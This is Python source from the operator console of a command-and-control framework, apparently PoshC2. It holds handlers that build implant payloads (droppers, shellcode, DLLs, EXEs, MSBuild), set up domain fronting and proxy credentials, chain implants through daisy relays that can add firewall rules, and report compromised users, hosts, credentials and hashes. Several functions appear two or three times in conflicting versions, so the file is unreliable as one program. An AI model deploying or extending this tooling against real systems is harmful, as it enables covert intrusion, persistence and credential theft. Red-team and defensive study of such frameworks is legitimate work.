def do_get_opsec_events(user, command): events = get_opsec_events() if events: eventsformatted = "ID Date Owner Event Note \n" for i in events: eventsformatted += "%s %s %s %s %s \n" % (i[0], i[1], i[2], i[3], i[4]) print_good(eventsformatted) input("Press Enter to continue...") clear()
def do_add_autorun(user, command): if command == "add-autorun": print_bad("Please specify a module to autorun") return autorun = command.replace("add-autorun ", "") autorun = autorun.replace("add-autorun", "") add_autorun(autorun) print_good("add-autorun: %s\r\n" % autorun) input("Press Enter to continue...") clear()
def do_set_killdate(user, command): new_killdate = command.replace("set-killdate ", "") new_killdate = new_killdate.replace("set-killdate", "").strip() if not validate_killdate(new_killdate): print_bad("Invalid killdate format, please specify a killdate in format yyyy-MM-dd") else: update_item("KillDate", "C2Server", new_killdate) print_good("Updated KillDate (Remember to generate new payloads and get new implants): %s\r\n" % new_killdate) input("Press Enter to continue...") clear()
def do_set_defaultbeacon(user, command): new_sleep = command.replace("set-defaultbeacon ", "") new_sleep = new_sleep.replace("set-defaultbeacon", "") if not validate_sleep_time(new_sleep): print_bad("Invalid sleep command, please specify a time such as 50s, 10m or 1h") else: update_item("DefaultSleep", "C2Server", new_sleep) print_good("Updated set-defaultbeacon (Restart C2 Server): %s\r\n" % new_sleep) input("Press Enter to continue...") clear()
def do_createdaisypayload(user, command): name = input(Colours.GREEN + "Daisy Payload Name: e.g. DC1 ") default_url = get_first_url(PayloadCommsHost, DomainFrontHeader) daisyurl = input(f"Daisy URL: e.g. {default_url} ") if ("http://127.0.0.1" in daisyurl): daisyurl = daisyurl.replace("http://127.0.0.1", "http://localhost") if ("https://127.0.0.1" in daisyurl): daisyurl = daisyurl.replace("https://127.0.0.1", "https://localhost") daisyhostid = input("Select Daisy Implant Host: e.g. 5 ") daisyhost = get_implantbyid(daisyhostid) proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}" pbindsecret = PBindSecret pbindpipename = PBindPipeName daisyurl, daisyurl_count = string_to_array(daisyurl) daisyhostheader = "" c = 0 daisyurls = daisyurl.split(",") for url in daisyurls: if c > 0: daisyhostheader += ",\"\"" else: daisyhostheader += "\"\"" c += 1 C2 = get_c2server_all() urlId = new_urldetails(name, C2.PayloadCommsHost, C2.DomainFrontHeader, "", "", "", "") newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, "%s?d" % get_newimplanturl(), PayloadsDirectory, PowerShellProxyCommand=proxynone, URLID=urlId, PBindPipeName=pbindpipename, PBindSecret=pbindsecret) newPayload.PSDropper = (newPayload.PSDropper).replace( "$pid;%s" % (daisyurl), "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain)) newPayload.CreateDroppers("%s_" % name) newPayload.CreateShellcode("%s_" % name) newPayload.CreateRaw("%s_" % name) newPayload.CreateDlls("%s_" % name) newPayload.CreateEXE("%s_" % name) newPayload.CreateMsbuild("%s_" % name) newPayload.CreateDonutShellcode("%s_" % name) newPayload.BuildDynamicPayloads("%s_" % name) print_good("Created new %s daisy payloads" % name) input("Press Enter to continue...") clear()
def do_createnewpayload(user, command, creds=None): params = re.compile("createnewpayload ", re.IGNORECASE) params = params.sub("", command) creds = None if "-credid" in params: creds, params = get_creds_from_params(params, user) if creds is None: return if not creds['Password']: print_bad("This command does not support credentials with hashes") input("Press Enter to continue...") clear() return name = input(Colours.GREEN + "Proxy Payload Name: e.g. Scenario_One ") comms_url = input("Comms URL: https://www.example.com ") domain = (comms_url.lower()).replace('https://', '') domain = domain.replace('http://', '') domainfront = input("Domain front hostname: jobs.azureedge.net ") proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ") randomid = randomuri(5) proxyuser = "" proxypass = "" credsexpire = "" if proxyurl: if creds is not None: proxyuser = "******" % (creds['Domain'], creds['Username']) proxypass = creds['Password'] else: proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ") proxypass = input("Proxy Password: e.g. Password1 ") credsexpire = input( Colours.GREEN + "Password/Account Expiration Date: .e.g. 15/03/2018 ") imurl = "%s?p" % get_newimplanturl() else: imurl = get_newimplanturl() C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], comms_url, domainfront, C2[8], proxyuser, proxypass, proxyurl, "", "", C2[17], C2[18], C2[19], imurl, PayloadsDirectory) newPayload.CreateRaw("%s_" % name) newPayload.CreateDlls("%s_" % name) newPayload.CreateShellcode("%s_" % name) newPayload.CreateEXE("%s_" % name) newPayload.CreateMsbuild("%s_" % name) newPayload.CreatePython("%s_" % name) newPayload.CreateCS("%s_" % name) new_urldetails(randomid, comms_url, domainfront, proxyurl, proxyuser, proxypass, credsexpire) print_good("Created new payloads") input("Press Enter to continue...") clear()
def do_tasks(user, command): alltasks = "" tasks = get_newtasks_all() if tasks is None: print_good("No tasks queued!\r\n") else: for task in tasks: imname = get_implantdetails(task[1]) alltasks += "[%s] : %s | %s\r\n" % (imname[0], "%s\\%s" % (imname[11], imname[2]), task[2]) print_good("Queued tasks:\r\n\r\n%s" % alltasks) input("Press Enter to continue...") clear()
def do_show_serverinfo(user, command): C2 = get_c2server_all() detailsformatted = "\nPayloadCommsHost: %s\nEncKey: %s\nDomainFrontHeader: %s\nDefaultSleep: %s\nKillDate: %s\nGET_404_Response: %s\nPoshProjectDirectory: %s\nQuickCommand: %s\nDownloadURI: %s\nDefaultProxyURL: %s\nDefaultProxyUser: %s\nDefaultProxyPass: %s\nURLS: %s\nSocksURLS: %s\nInsecure: %s\nUserAgent: %s\nReferer: %s\nPushover_APIToken: %s\nPushover_APIUser: %s\nEnableNotifications: %s\n" % ( C2.PayloadCommsHost, C2.EncKey, C2.DomainFrontHeader, C2.DefaultSleep, C2.KillDate, C2.GET_404_Response, C2.PoshProjectDirectory, C2.QuickCommand, C2.DownloadURI, C2.ProxyURL, C2.ProxyUser, C2.ProxyPass, C2.URLS, C2.SocksURLS, C2.Insecure, C2.UserAgent, C2.Referrer, C2.Pushover_APIToken, C2.Pushover_APIUser, C2.EnableNotifications) print_good(detailsformatted) input("Press Enter to continue...") clear()
def do_tasks(user, command): alltasks = "" tasks = get_newtasks_all() if tasks is None: print_good("No tasks queued!\r\n") else: for task in tasks: imname = get_implantdetails(task.RandomURI) alltasks += f"[{imname.ImplantID}] : {imname.Domain}\\{imname.User} | {task.Command} : {task.TaskID}\r\n" print_good("Queued tasks:\r\n\r\n%s" % alltasks) input("Press Enter to continue...") clear()
def do_opsec(user, command): implants = get_implants_all() comtasks = get_tasks() hosts = "" uploads = "" urls = get_c2urls() urlformatted = "ID Name URL HostHeader ProxyURL ProxyUsername ProxyPassword CredentialExpiry\n" for i in urls: urlformatted += "%s %s %s %s %s %s %s %s \n" % ( i[0], i[1], i[2], i[3], i[4], i[5], i[6], i[7]) users = "" if implants: for implant in implants: if implant.Hostname not in hosts: hosts += "%s \n" % implant.Hostname if comtasks: for task in comtasks: implant = get_implantdetails(task[1]) command = task[2].lower() output = task[3].lower() if implant.User not in users: users += "%s\\%s @ %s\n" % (implant.Domain, implant.User, implant.Hostname) if "invoke-pbind" in command and "connected" in output: tg = re.search("(?<=-target )\\S*", str(command)) if tg[0] not in hosts: hosts += "%s \n" % tg[0] if "uploading file" in command: uploadedfile = command uploadedfile = uploadedfile.partition( "uploading file: ")[2].strip() filehash = uploadedfile.partition(" with md5sum:")[2].strip() uploadedfile = uploadedfile.partition( " with md5sum:")[0].strip() uploadedfile = uploadedfile.strip('"') uploads += "%s\t%s\t%s\n" % (implant.User, filehash, uploadedfile) if "installing persistence" in output: line = command.replace('\n', '') line = line.replace('\r', '') filenameuploaded = line.rstrip().split(":", 1)[1] uploads += "%s %s \n" % (implant.User, filenameuploaded) if "written scf file" in output: uploads += "%s %s \n" % (implant.User, output) creds, hashes = parse_creds(get_creds()) print_good( "\nUsers Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s\nCredentials Compromised: \n%s\nHashes Compromised: \n%s" % (users, hosts, urlformatted, uploads, creds, hashes)) print_good("\nOpSec Events:") do_get_opsec_events(user, command)
def do_insert_opsec_events(user, command): opsec_timestamp_format = "%Y-%m-%d %H:%M" timestamp_string = datetime.now().strftime(opsec_timestamp_format) timestamp = input(f"Timestamp: (Press Enter for {timestamp_string}) ").strip() if not timestamp: timestamp = timestamp_string if not validate_timestamp_string(timestamp, opsec_timestamp_format): print_bad("Please enter a valid timestamp in format yyyy-mm-dd HH:MM") input("Press Enter to continue...") clear() return event = input("Event: ") note = input("Notes: ") insert_opsec_event(timestamp, user, event, note) print_good("Event added successfully") do_get_opsec_events(user, command)
def do_opsec(user, command): implants = get_implants_all() comtasks = get_tasks() hosts = "" uploads = "" urls = "" users = "" for i in implants: if i[3] not in hosts: hosts += "%s \n" % i[3] if i[9] not in urls: urls += "%s \n" % i[9] for t in comtasks: hostname = get_implantdetails(t[1]) command = t[2].lower() output = t[3].lower() if hostname[2] not in users: users += "%s\\%s @ %s\n" % (hostname[11], hostname[2], hostname[3]) if "invoke-pbind" in command and "connected" in output: tg = re.search("(?<=-target )\\S*", str(command)) if tg[0] not in hosts: hosts += "%s \n" % tg[0] if "uploading file" in command: uploadedfile = command uploadedfile = uploadedfile.partition( "uploading file: ")[2].strip() filehash = uploadedfile.partition(" with md5sum:")[2].strip() uploadedfile = uploadedfile.partition(" with md5sum:")[0].strip() uploadedfile = uploadedfile.strip('"') uploads += "%s\t%s\t%s\n" % (hostname[3], filehash, uploadedfile) if "installing persistence" in output: implant_details = get_implantdetails(t[2]) line = command.replace('\n', '') line = line.replace('\r', '') filenameuploaded = line.rstrip().split(":", 1)[1] uploads += "%s %s \n" % (implant_details[3], filenameuploaded) if "written scf file" in output: implant_details = get_implantdetails(t[2]) uploads += "%s %s\n" % (implant_details[3], output[output.indexof(':'):]) creds, hashes = parse_creds(get_creds()) print_good( "\nUsers Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s\nCredentials Compromised: \n%s\nHashes Compromised: \n%s" % (users, hosts, urls, uploads, creds, hashes)) input("Press Enter to continue...") clear()
def do_add_hosted_file(user, command): FilePath = input("File Path: .e.g. /tmp/application.docx: ") URI = input("URI Path: .e.g. /downloads/2020/application: ") ContentType = input("Content Type: .e.g. (text/html): ") if ContentType == "": ContentType = "text/html" Base64 = no_yes_prompt("Base64 Encode File") if not Base64: Base64 = "No" else: Base64 = "Yes" if not URI or not FilePath: print_bad("Please enter a FilePath and URI") input("Press Enter to continue...") clear() return insert_hosted_file(URI, FilePath, ContentType, Base64, "Yes") FirstURL = get_first_url(select_item("PayloadCommsHost", "C2Server"), select_item("DomainFrontHeader", "C2Server")) print_good("Added hosted-file \n\n%s%s -> %s (%s)\r\n" % (FirstURL, URI, FilePath, ContentType)) do_show_hosted_files(user, command) clear()
def do_createproxypayload(user, command, creds=None): params = re.compile("createproxypayload ", re.IGNORECASE) params = params.sub("", command) creds = None if "-credid" in params: creds, params = get_creds_from_params(params, user) if creds is None: return if not creds['Password']: print_bad("This command does not support credentials with hashes") input("Press Enter to continue...") clear() return if creds is not None: proxyuser = "******" % (creds['Domain'], creds['Username']) proxypass = creds['Password'] else: proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ") proxypass = input("Proxy Password: e.g. Password1 ") proxyurl = input(Colours.GREEN + "Proxy URL: .e.g. http://10.150.10.1:8080 ") credsexpire = input("Password/Account Expiration Date: .e.g. 15/03/2018 ") update_item("ProxyURL", "C2Server", proxyurl) update_item("ProxyUser", "C2Server", proxyuser) update_item("ProxyPass", "C2Server", proxypass) C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) newPayload.CreateRaw("Proxy") newPayload.CreateDlls("Proxy") newPayload.CreateShellcode("Proxy") newPayload.CreateEXE("Proxy") newPayload.CreateMsbuild("Proxy") newPayload.CreateCS("Proxy") new_urldetails("Proxy", C2[1], C2[3], proxyurl, proxyuser, proxypass, credsexpire) print_good("Created new proxy payloads") input("Press Enter to continue...") clear()
def do_creds(user, command): if "-add " in command: p = re.compile(r"-domain=([^\s]*)") domain = re.search(p, command) if domain: domain = domain.group(1) p = re.compile(r"-username=([^\s]*)") username = re.search(p, command) if username: username = username.group(1) p = re.compile(r"-password=([^\s]*)") password = re.search(p, command) if password: password = password.group(1) else: p = re.compile(r"-password=([^\s]*)") password = re.search(p, command) if password: password = password.group(1) p = re.compile(r"-hash=([^\s]*)") hash = re.search(p, command) if hash: hash = hash.group(1) if not domain or not username: print_bad("Please specify a domain and username") return if password and hash: print_bad("Please specify a password or a hash, but not both") return if not password and not hash: print_bad("Please specify either a password or a hash") return insert_cred(domain, username, password, hash) print_good("Credential added successfully") return elif "-search " in command: username = command.replace("creds ", "") username = username.replace("-search ", "") username = username.strip() creds, hashes = parse_creds(get_creds_for_user(username)) print_good("Credentials Compromised: \n%s\nHashes Compromised: \n%s" % (creds, hashes)) return else: creds, hashes = parse_creds(get_creds()) print_good( "\nCredentials Compromised: \n%s\nHashes Compromised: \n%s" % (creds, hashes))
def do_cleartasks(user, command): drop_newtasks() print_good("Emptied tasks queue\r\n") input("Press Enter to continue...") clear()
def do_turnon_notifications(user, command): update_item("EnableNotifications", "C2Server", "Yes") print_good("Turned on notifications on new implant") input("Press Enter to continue...") clear()
def do_nuke_autoruns(user, command): del_autoruns() print_good("nuked autoruns\r\n") input("Press Enter to continue...") clear()
def do_del_autorun(user, command): autorun = command.replace("del-autorun ", "") del_autorun(autorun) print_good("deleted autorun\r\n") input("Press Enter to continue...") clear()
def do_list_autoruns(user, command): print_good(get_autorun()) input("Press Enter to continue...") clear()
def do_startdaisy(user, command, randomuri): check_module_loaded("invoke-daisychain.ps1", randomuri, user) elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END) domain_front = "" proxy_user = "" proxy_pass = "" proxy_url = "" cred_expiry = "" if elevated.lower() == "n": cont = input( Colours.RED + "Daisy from an unelevated context can only bind to localhost, continue? y/N " + Colours.END) if cont.lower() == "n" or cont == "": return bind_ip = "localhost" else: bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " + Colours.END) bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " + Colours.END) firstdaisy = input(Colours.GREEN + "Is this the first daisy in the chain? Y/n? " + Colours.END) default_url = get_first_url(PayloadCommsHost, DomainFrontHeader) default_df_header = get_first_dfheader(DomainFrontHeader) if default_df_header == default_url: default_df_header = None if firstdaisy.lower() == "y" or firstdaisy == "": upstream_url = input(Colours.GREEN + f"C2 URL (leave blank for {default_url}): " + Colours.END) domain_front = input( Colours.GREEN + f"Domain front header (leave blank for {str(default_df_header)}): " + Colours.END) proxy_user = input( Colours.GREEN + "Proxy user (<domain>\\<username>, leave blank if none): " + Colours.END) proxy_pass = input(Colours.GREEN + "Proxy password (leave blank if none): " + Colours.END) proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " + Colours.END) cred_expiry = input( Colours.GREEN + "Password/Account Expiration Date: .e.g. 15/03/2018: ") if not upstream_url: upstream_url = default_url if not domain_front: if default_df_header: domain_front = default_df_header else: domain_front = "" else: upstream_daisy_host = input(Colours.GREEN + "Upstream daisy server: " + Colours.END) upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port: " + Colours.END) upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}" command = f"invoke-daisychain -daisyserver http://{bind_ip} -port {bind_port} -c2server {upstream_url}" if domain_front: command = command + f" -domfront {domain_front}" if proxy_url: command = command + f" -proxyurl '{proxy_url}'" if proxy_user: command = command + f" -proxyuser '{proxy_user}'" if proxy_pass: command = command + f" -proxypassword '{proxy_pass}'" if elevated.lower() == "y" or elevated == "": firewall = input(Colours.GREEN + "Add firewall rule? (uses netsh.exe) y/N: ") if firewall.lower() == "n" or firewall == "": command = command + " -nofwrule" else: print_good( "Not elevated so binding to localhost and not adding firewall rule" ) command = command + " -localhost" urls = get_allurls() command = command + f" -urls '{urls}'" new_task(command, user, randomuri) update_label("DaisyHost", randomuri) createpayloads = input( Colours.GREEN + "Would you like to create payloads for this Daisy Server? Y/n ") if createpayloads.lower() == "y" or createpayloads == "": name = input(Colours.GREEN + "Enter a payload name: " + Colours.END) daisyhost = get_implantdetails(randomuri) proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}" C2 = get_c2server_all() urlId = new_urldetails(name, f"\"http://{bind_ip}:{bind_port}\"", "\"\"", proxy_url, proxy_user, proxy_pass, cred_expiry) newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, "%s?d" % get_newimplanturl(), PayloadsDirectory, URLID=urlId, PowerShellProxyCommand=proxynone) newPayload.PSDropper = (newPayload.PSDropper).replace( "$pid;%s" % (upstream_url), "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain)) newPayload.CreateDroppers(name) newPayload.CreateRaw(name) newPayload.CreateDlls(name) newPayload.CreateShellcode(name) newPayload.CreateEXE(name) newPayload.CreateMsbuild(name) print_good("Created new %s daisy payloads" % name)
def do_get_killdate(user, command): killdate = select_item("KillDate", "C2Server") print_good(f"KillDate: {killdate}") input("Press Enter to continue...") clear()
def do_opsec(user, command): print_good(get_opsec_string(user, command)) do_get_opsec_events(user, command)
def do_history(user, command): print_good(get_history()) input("Press Enter to continue...") clear()
def do_show_serverinfo(user, command): i = get_c2server_all() detailsformatted = "\nPayloadCommsHost: %s\nEncKey: %s\nDomainFrontHeader: %s\nDefaultSleep: %s\nKillDate: %s\nGET_404_Response: %s\nPoshProjectDirectory: %s\nPayloadCommsPort: %s\nQuickCommand: %s\nDownloadURI: %s\nDefaultProxyURL: %s\nDefaultProxyUser: %s\nDefaultProxyPass: %s\nEnableSounds: %s\nURLS: %s\nSocksURLS: %s\nInsecure: %s\nUserAgent: %s\nReferer: %s\nPushover_APIToken: %s\nPushover_APIUser: %s\nEnableNotifications: %s\n" % (i[1], i[2], i[3], i[4], i[5], i[6], i[7], i[8], i[9], i[10], i[11], i[12], i[13], i[14], i[15], i[16], i[17], i[18], i[19], i[20], i[21], i[22]) print_good(detailsformatted) input("Press Enter to continue...") clear()
def do_help(user, command): print_good(pre_help) input("Press Enter to continue...") clear()
def do_show_serverinfo(user, command): i = get_c2server_all() detailsformatted = "\nHostnameIP: %s\nEncKey: %s\nDomainFrontHeader: %s\nDefaultSleep: %s\nKillDate: %s\nHTTPResponse: %s\nFolderPath: %s\nServerPort: %s\nQuickCommand: %s\nDownloadURI: %s\nDefaultProxyURL: %s\nDefaultProxyUser: %s\nDefaultProxyPass: %s\nEnableSounds: %s\nAPIKEY: %s\nMobileNumber: %s\nURLS: %s\nSocksURLS: %s\nInsecure: %s\nUserAgent: %s\nReferer: %s\nAPIToken: %s\nAPIUser: %s\nEnableNotifications: %s\n" % (i[1], i[2], i[3], i[4], i[5], i[6], i[7], i[8], i[9], i[10], i[11], i[12], i[13], i[14], i[15], i[16], i[17], i[18], i[19], i[20], i[21], i[22], i[23], i[24]) print_good(detailsformatted) input("Press Enter to continue...") clear()
def do_startdaisy(user, command, randomuri): check_module_loaded("daisy.dll", randomuri, user) elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END) domain_front = "" proxy_user = "" proxy_pass = "" proxy_url = "" if elevated.lower() == "n": cont = input(Colours.RED + "Daisy from an unelevated context can only bind to localhost, continue? y/N " + Colours.END) if cont.lower() == "n" or cont == "": return bind_ip = "localhost" else: bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " + Colours.END) bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " + Colours.END) firstdaisy = input(Colours.GREEN + "Is this the first daisy in the chain? Y/n? " + Colours.END) if firstdaisy.lower() == "y" or firstdaisy == "": upstream_url = input(Colours.GREEN + f"C2 URL (leave blank for {PayloadCommsHost}): " + Colours.END) if DomainFrontHeader: domain_front = input(Colours.GREEN + f"Domain front header (leave blank for {DomainFrontHeader}): " + Colours.END) else: domain_front = input(Colours.GREEN + f"Domain front header (leave blank for configured value of no header): " + Colours.END) proxy_user = input(Colours.GREEN + "Proxy user (<domain>\\<username>, leave blank if none): " + Colours.END) proxy_pass = input(Colours.GREEN + "Proxy password (leave blank if none): " + Colours.END) proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " + Colours.END) if not upstream_url: upstream_url = PayloadCommsHost if not domain_front: domain_front = DomainFrontHeader else: upstream_daisy_host = input(Colours.GREEN + "Upstream daisy server: " + Colours.END) upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port: " + Colours.END) upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}" domain_front = upstream_daisy_host urls = get_allurls().replace(" ", "") useragent = UserAgent command = f"invoke-daisychain \"{bind_ip}\" \"{bind_port}\" \"{upstream_url}\" \"{domain_front}\" \"{proxy_url}\" \"{proxy_user}\" \"{proxy_pass}\" \"{useragent}\" {urls}" new_task(command, user, randomuri) update_label("DaisyHost", randomuri) createpayloads = input(Colours.GREEN + "Would you like to create payloads for this Daisy Server? Y/n ") if createpayloads.lower() == "y" or createpayloads == "": name = input(Colours.GREEN + "Enter a payload name: " + Colours.END) daisyhost = get_implantdetails(randomuri) proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}" C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], f"http://{bind_ip}", "", f"{bind_port}", "", "", "", "", proxynone, C2[17], C2[18], C2[19], "%s?d" % get_newimplanturl(), PayloadsDirectory) newPayload.PSDropper = (newPayload.PSDropper).replace("$pid;%s" % (upstream_url), "$pid;%s@%s" % (daisyhost[11], daisyhost[3])) newPayload.CreateRaw(name) newPayload.CreateDlls(name) newPayload.CreateShellcode(name) newPayload.CreateEXE(name) newPayload.CreateMsbuild(name) newPayload.CreateCS(name) new_urldetails(name, C2[1], C2[3], f"Daisy: {name}", upstream_url, daisyhost[0], "") print_good("Created new %s daisy payloads" % name)
def do_createnewpayload(user, command, creds=None, shellcodeOnly=False): params = re.compile("createnewpayload ", re.IGNORECASE) params = params.sub("", command) creds = None if "-credid" in params: creds, params = get_creds_from_params(params, user) if creds is None: return if not creds['Password']: print_bad("This command does not support credentials with hashes") input("Press Enter to continue...") clear() return name = input(Colours.GREEN + "Proxy Payload Name: e.g. Scenario_One ") comms_url = input( "Domain or URL in array format: https://www.example.com,https://www.example2.com " ) domainfront = input( "Domain front URL in array format: fjdsklfjdskl.cloudfront.net,jobs.azureedge.net " ) proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ") pbindsecret = input(f"PBind Secret: e.g {PBindSecret} ") pbindpipename = input(f"PBind Pipe Name: e.g. {PBindPipeName} ") comms_url, PayloadCommsHostCount = string_to_array(comms_url) domainfront, DomainFrontHeaderCount = string_to_array(domainfront) if PayloadCommsHostCount == DomainFrontHeaderCount: pass else: print("[-] Error - different number of host headers and URLs") input("Press Enter to continue...") clear() proxyuser = "" proxypass = "" credsexpire = "" if proxyurl: if creds is not None: proxyuser = "******" % (creds['Domain'], creds['Username']) proxypass = creds['Password'] else: proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ") proxypass = input("Proxy Password: e.g. Password1 ") credsexpire = input( Colours.GREEN + "Password/Account Expiration Date: .e.g. 15/03/2018 ") imurl = "%s?p" % get_newimplanturl() else: imurl = get_newimplanturl() C2 = get_c2server_all() urlId = new_urldetails(name, comms_url, domainfront, proxyurl, proxyuser, proxypass, credsexpire) newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, imurl, PayloadsDirectory, URLID=urlId, PBindPipeName=pbindpipename, PBindSecret=pbindsecret) newPayload.CreateDroppers("%s_" % name) newPayload.CreateShellcode("%s_" % name) if not shellcodeOnly: newPayload.CreateRaw("%s_" % name) newPayload.CreateDlls("%s_" % name) newPayload.CreateEXE("%s_" % name) newPayload.CreateMsbuild("%s_" % name) newPayload.CreatePython("%s_" % name) newPayload.CreateDonutShellcode("%s_" % name) print_good("Created new payloads") input("Press Enter to continue...") clear()